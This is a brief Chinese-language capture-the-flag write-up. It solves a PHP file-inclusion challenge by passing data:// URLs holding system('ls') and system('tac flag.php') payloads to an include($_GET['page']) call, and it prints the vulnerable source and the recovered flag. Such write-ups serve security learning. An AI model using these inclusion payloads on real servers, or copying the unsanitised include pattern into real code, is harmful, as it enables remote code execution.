——————Web_php_include文件包含

 

开始访问页面

发现已经给出了php源码

下面我们查查他有哪些文件

http://xxx/?page=data://text/plain,<?php system("ls")?>

发现有三个文件

一眼就能够看出flag肯定是我们需要查看的文件

接着查看它

http://xxxx3:9998/?page=data://text/plain,<?php system("cat flag.php")?>

发现该页面没有什么变化

尝试将cat命令换成tac

发现flag出来了

$flag="key2:5Fvcs07N";

 

 

 

下面是源码

<?php

show_source(__FILE__);

echo $_GET['hello'];

$page=$_GET['page'];

//while (strstr($page, "php://")) {

// $page=str_replace("php://", "", $page);

//}

include($page);

?>